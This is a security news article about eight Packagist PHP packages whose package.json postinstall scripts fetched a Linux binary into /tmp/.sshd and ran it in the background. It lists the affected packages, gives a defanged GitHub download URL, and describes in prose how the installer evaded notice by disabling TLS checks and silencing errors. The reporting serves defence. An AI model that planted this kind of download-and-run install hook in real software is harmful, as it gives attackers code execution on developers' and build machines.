Contact us
Contact us

News

About

Home Crypto News Packagist attack adds Linux malware via package.json

Packagist attack adds Linux malware via package.json

Author Whitewallet Research
Posted: 23 May 2026, 17:07 CET 2 min read

Eight Packagist PHP packages contained package.json postinstall scripts that downloaded a Linux binary from a GitHub Releases URL, saved it to /tmp/.sshd, made it executable and ran it.

Security researchers reported a coordinated supply chain attack that affected eight packages on Packagist. The packages contained package.json postinstall scripts that downloaded a Linux binary from a GitHub Releases URL, saved it to /tmp/.sshd, changed its permissions to make it executable and launched it in the background. The malicious package versions have been removed from Packagist.

Application security firm Socket examined the campaign and found the malicious code was bundled inside package artifacts rather than the Composer metadata file composer.json. The actor placed a Node lifecycle script in package.json so the postinstall hook would run in environments that include JavaScript build tooling alongside PHP code.

The affected packages and versions include moritz-sauer-13/silverstripe-cms-theme (dev-master), crosiersource/crosierlib-base (dev-master), devdojo/wave (dev-main), devdojo/genesis (dev-main), katanaui/katana (dev-main), elitedevsquad/sidecar-laravel (3.x-dev), r2luna/brain (dev-main) and baskarcm/tzi-chat-ui (dev-main).

Socket’s analysis shows the postinstall script attempted to download a second-stage binary from github[.]com/parikhpreyash4/systemd-network-helper-aa5c751f, save it to /tmp/.sshd, run chmod to grant execute permissions for all users and start the file in the background. The installer also disabled TLS verification and suppressed error output. The downloaded component carried the label “gvfsd-network,” a name that references the GNOME Virtual File System daemon; the GitHub account that hosted the release is no longer available, so the exact behavior of the binary could not be determined.

Investigators found references to the same payload across roughly 777 files on GitHub. In some repositories the malicious code appeared in GitHub workflow files, where it could execute during GitHub Actions jobs. It is not clear how many of the references reflect distinct compromises, forks, duplicate artifacts or cached copies.

Socket warned: “Even without the second-stage binary, the malicious installer is enough to warrant blocking.” The firm also noted the installer provides remote code execution during installation or build workflows and attempts to hide its activity by disabling TLS verification, suppressing errors and running a downloaded binary in the background.

Whitewallet Research
Author

Articles by this author

Malware in Pirated PC Games Steals Passwords and Crypto
Malware in Pirated PC Games Steals Passwords and Crypto
jun 8
Armstrong: Energy and Compute, Not Models, Will Cap AI Growth
Armstrong: Energy and Compute, Not Models, Will Cap AI Growth
jun 8
Custodial vs non-custodial wallet
Custodial vs non-custodial wallet
may 30
What is a crypto seed phrase
What is a crypto seed phrase
may 25
Seed phrase vs private key
Seed phrase vs private key
may 21

Latest News

MORE
Adam Back: Bitcoin won’t fire miners; Dashjr readies fork

Adam Back: Bitcoin won’t fire miners; Dashjr readies fork

jun 12 2 min read
Coinbase Lets AI Agents Trade Inside User-Controlled Limits

Coinbase Lets AI Agents Trade Inside User-Controlled Limits

jun 12 2 min read
Hackers Impersonate ChatGPT, Claude and DeepSeek

Hackers Impersonate ChatGPT, Claude and DeepSeek

jun 11 2 min read
Delaware advances bill to ban crypto ATMs after scam surge

Delaware advances bill to ban crypto ATMs after scam surge

jun 11 2 min read
MORE